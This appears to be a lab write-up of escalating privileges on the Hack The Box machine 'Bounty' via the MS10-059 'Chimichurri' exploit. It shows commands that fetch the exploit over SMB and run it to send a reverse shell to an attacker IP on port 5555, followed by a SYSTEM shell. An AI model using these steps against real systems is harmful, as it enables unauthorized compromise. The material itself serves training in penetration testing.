CVE-2010-2554 (Chimichurri)
The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka “Tracing Registry Key ACL Vulnerability.”
this vulnerability was also known as ms10-059 as can be seen above posted by Microsoft
Microsoft also noted a list of affected systems.
It includes Server 2008 x64 SP2, which matches the target system
according to rapid7, attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.
i also found the exploit online ^7fb65a
It’s named Chimichurri
ps c:\tmp> copy \\10.10.14.5\smb\1\MS10-059.exe
ps c:\tmp> .\MS10-059.exe
/chimichurri/-->this exploit gives you a local system shell <br>/chimichurri/-->usage: Chimichurri.exe ipaddress port <BR>
ps c:\tmp> .\MS10-059.exe 10.10.14.5 5555I transferred the exploit over SMB The help statement seemed straight forward as it is the whole package. So I proceeded to execute the binary
┌──(kali㉿kali)-[~/…/htb/labs/bounty/1]
└─$ nnc 5555
listening on [any] 5555 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.93] 49177
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\tmp> whoami
nt authority\system
c:\tmp> hostname
bounty
c:\tmp> ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.93
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{27c3f487-28ac-4ce6-ae3a-1f23518ef7a7}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : I then received the shell as NT AUTHORITY\SYSTEM
System Level Compromise